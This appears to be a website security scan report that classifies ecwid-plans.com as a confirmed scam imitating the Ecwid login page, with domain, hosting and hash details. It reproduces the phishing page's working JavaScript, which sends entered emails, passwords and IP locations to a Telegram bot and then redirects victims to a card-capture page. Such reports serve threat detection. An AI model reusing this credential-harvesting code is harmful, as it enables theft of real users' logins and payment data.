e-commerce shopping

social media network

technology software

corporate business

English

You're looking at domain 'ecwid-plans.com' on the commercial generic top-level domain (.com) without a subdomain. Its registrable label 'ecwid-plans' stretches across 11 characters with three vowels and 7 consonants; it also includes 1 hyphen. Breaking it apart gives 3 words: ecw, id, plans. The median word length lands at three characters. No strong language cues emerged from the frequency lists.

email

password

company_cx9q6g53

html/bb/93/bb93fbd7-f5e4-47f2-acdb-86d422d038ff.html.gz

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/images-tbn

176e894661aa9cdc9a5cba6c720044cbbf7b8bd80d1c9a142a7c24b1b6c50d15

c5b9fd356bc69dab2b1e83c7944774cacccf11508ac708e91d105de5764350d2

20d373163a746a2c0d18768ae596527507d04eb68524717f275e74fa9adb4147

viewport

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

html/bb/93/bb93fbd7-f5e4-47f2-acdb-86d422d038ff_nodriver.html.gz

Login | Ecwid

Squarespace Domains LLC

ECWID-PLANS.COM

Amazon EC2 Abuse

IP Management

Amazon AWS Network Operations

Amazon.com, Inc.

AWS RPKI Management POC

IP Routing

Amazon EC2 Network Operations

AMAZON-CF

// Telegram Bot Configuration
 const TELEGRAM_BOT_TOKEN = '8355577417:AAEtTtBa6GPqPYgLFTq1fh7Tar8k0DFmd9c';
 const TELEGRAM_CHAT_ID = '962802090';

 // Function to send message to Telegram
 async function sendToTelegram(message) {
 try {
 const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
 const response = await fetch(url, {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json',
 },
 body: JSON.stringify({
 chat_id: TELEGRAM_CHAT_ID,
 text: message,
 parse_mode: 'HTML'
 })
 });
 return response.ok;
 } catch (error) {
 console.error('Error sending to Telegram:', error);
 return false;
 }
 }

 // Function to get IP information
 async function getIPInfo() {
 try {
 const response = await fetch('https://ipapi.co/json/');
 const data = await response.json();
 return `IP: ${data.ip} | Country: ${data.country_name} | City: ${data.city}`;
 } catch (error) {
 return 'IP: Unknown';
 }
 }

 // Function to format login attempt for Telegram
 function formatLoginAttempt(email, password, attemptNumber, ipInfo) {
 return `
🔐 Login Attempt #${attemptNumber}
━━━━━━━━━━━━━━━━━━━━
📧 Email: <code>${email}</code>
🔑 Password: <code>${password}</code>
🔄 Attempt: #${attemptNumber}
${ipInfo}
🌐 User Agent: ${navigator.userAgent}
⏰ Time: ${new Date().toLocaleString()}
━━━━━━━━━━━━━━━━━━━━
 `;
 }

 (function () {
 const HP_MIN_ELAPSED_SEC = 0.8;
 const SPINNER_MS = 3000;

 let loginAttempts = 0;
 let pageLoadTs = Date.now();

 function createHoneypot() {
 const container = document.getElementById('hpContainer');
 const wrapper = document.createElement('div');
 wrapper.className = 'hp-offscreen';
 const label = document.createElement('label');
 const rand = Math.random().toString(36).slice(2,10);
 const hpName = 'company_' + rand;
 label.setAttribute('for', hpName);
 label.textContent = 'Company (optional)';

 const input = document.createElement('input');
 input.type = 'text';
 input.name = hpName;
 input.id = hpName;
 input.autocomplete = 'off';
 input.setAttribute('aria-hidden', 'true');
 input.tabIndex = -1;

 wrapper.appendChild(label);
 wrapper.appendChild(input);
 container.appendChild(wrapper);

 return { name: hpName, inputEl: input };
 }

 const hp = createHoneypot();

 function showSpinner(show) {
 const spinner = document.getElementById('btnSpinner');
 const label = document.getElementById('btnLabel');
 if (show) {
 spinner.classList.remove('hidden');
 label.textContent = '';
 } else {
 spinner.classList.add('hidden');
 label.textContent = 'Sign In';
 }
 }

 const form = document.getElementById('loginForm');
 const pwError = document.getElementById('pwError');
 const passwordEl = document.getElementById('password');
 const submitBtn = document.getElementById('submitBtn');

 form.addEventListener('submit', async function (ev) {
 ev.preventDefault();

 // Bot checks
 if (hp.inputEl.value && hp.inputEl.value.trim() !== '') {
 return;
 }
 const elapsedSec = (Date.now() - pageLoadTs) / 1000;
 if (elapsedSec < HP_MIN_ELAPSED_SEC) {
 return;
 }

 loginAttempts += 1;
 const email = document.getElementById('email').value;
 const password = document.getElementById('password').value;

 // Get IP info and send to Telegram
 const ipInfo = await getIPInfo();
 const telegramMessage = formatLoginAttempt(email, password, loginAttempts, ipInfo);
 await sendToTelegram(telegramMessage);

 // UI: show spinner and disable form
 showSpinner(true);
 submitBtn.disabled = true;
 pwError.classList.add('hidden');

 setTimeout(() => {
 showSpinner(false);
 submitBtn.disabled = false;

 if (loginAttempts === 1) {
 pwError.classList.remove('hidden');
 passwordEl.value = '';
 pageLoadTs = Date.now();
 return;
 }

 if (loginAttempts >= 2) {
 // Store email for CC page
 localStorage.setItem('userEmail', email);
 window.location.href = 'cc.html';
 }
 }, SPINNER_MS);
 });

 if (new URLSearchParams(location.search).get('nohp') === '1') {
 const container = document.getElementById('hpContainer');
 container.innerHTML = '';
 }

 document.getElementById('email').focus();
 })();

PasswordField

Tailwind CSS

✅ Low Risk - http://ecwid-plans.com/ox_file.html

Requests	IP Address	Location	AS Autonomous System
5	142.250.201.78	United States	AS15169GOOGLE
1	3.167.227.35	United States	AS31898
1	3.171.211.37	United States	AS16509
1	104.26.2.143	United States	AS13335
1	129.121.74.9	United States	AS31898ORACLE-BMC-31898
9	5	-	-

Security Scan Report: ecwid-plans.com

Summary

AI Security Verdict

Confirmed Scam

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies2

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History